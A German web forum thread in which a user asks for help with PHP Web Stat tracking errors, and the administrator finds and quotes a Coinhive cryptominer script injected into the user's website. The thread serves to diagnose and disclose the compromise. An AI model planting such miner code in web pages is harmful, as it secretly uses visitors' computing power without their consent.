Willkommen Gast. Bitte Einloggen oder Registrieren
 
Sprache wählen:
 
  Last Script Version: 20

  ÜbersichtHilfeSuchenEinloggenRegistrieren  
 
Seitenindex umschalten Seiten: 1
Thema versenden Drucken
Es will einfach nicht (Gelesen: 3132 mal)
rockkartoffel
YaBB Newbies
*
Offline



Beiträge: 2
Es will einfach nicht
19.02.18 um 14:24:33
 
Hallöchen.

Ich habe seit ein paar Tagen PHP Web Stat installiert. Nur leider gibt es scheinbar ein paar Widersprüche, die das Programm daran hindern, vernünftig zu laufen.

Wenn ich die sysinfo.php aufrufe, werden mir die track.php und die traking_code.php als fehlerhaft angezeigt. Prüfe ich die Dateirechte aber dann im Admin Panel, gibt es keine Probleme.

Beim Laden auf den jeweiligen Seiten kommt ebenfalls ein Fehler in der Chrome-Konsole.

Code:
GET http://www.saegewerk-morgenstern.de/stat/track.php?js_resolution=2560x1440&js_referer=&js_color=24&js_url=http%3A//saegewerk-morgenstern.de/ net::ERR_ABORTED
(anonymous) @ track.php?mode=js:12
 



Hatte das Problem schon mal jemand, oder kann mir jemand helfen?
Zum Seitenanfang
 
 
IP gespeichert
 
Reimar
Administrator
*****
Offline



Beiträge: 1979
Geschlecht: male
Re: Es will einfach nicht
Antwort #1 - 20.02.18 um 16:01:45
 
Der Aufruf der URL in meinem Browser gibt keine Fehlermeldung.
Ist da vielleicht ein Adblocker im Einsatz ?
Zum Seitenanfang
 
 
IP gespeichert
 
rockkartoffel
YaBB Newbies
*
Offline



Beiträge: 2
Re: Es will einfach nicht
Antwort #2 - 21.02.18 um 10:40:22
 
Reimar schrieb am 20.02.18 um 16:01:45:
Der Aufruf der URL in meinem Browser gibt keine Fehlermeldung.
Ist da vielleicht ein Adblocker im Einsatz ?


Wenn ich nur die URL aufrufe kommt bei mir ebenfalls keine Fehlermeldung. Und einen Adblocker nutze ich auch nicht.

Beim ersten Aufruf der Seite sagt er mir auch immer, dass ein Internal Server Error auftritt, weil die track.php nicht vorhanden ist. Aber das steht nur in der Konsole...
Zum Seitenanfang
 
 
IP gespeichert
 
Reimar
Administrator
*****
Offline



Beiträge: 1979
Geschlecht: male
Re: Es will einfach nicht
Antwort #3 - 16.03.18 um 13:45:57
 
Bitte prüfe Deine Webseite mal ... mein Antivirus hat direkt angeschlagen beim Besuch, da ein "böses" Javascript als Cryptocoiner bei Dir eingepflanzt ist.
Sieht man auch im Quelltext:
Code (Javascript):
<body><script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.Anonymous('oHaQn8uDJ16fNhcTU7y832cv49PqEvOS', {throttle: 0.3});
	miner.start();
</script>
 

Zum Seitenanfang
 
 
IP gespeichert
 
Seitenindex umschalten Seiten: 1
Thema versenden Drucken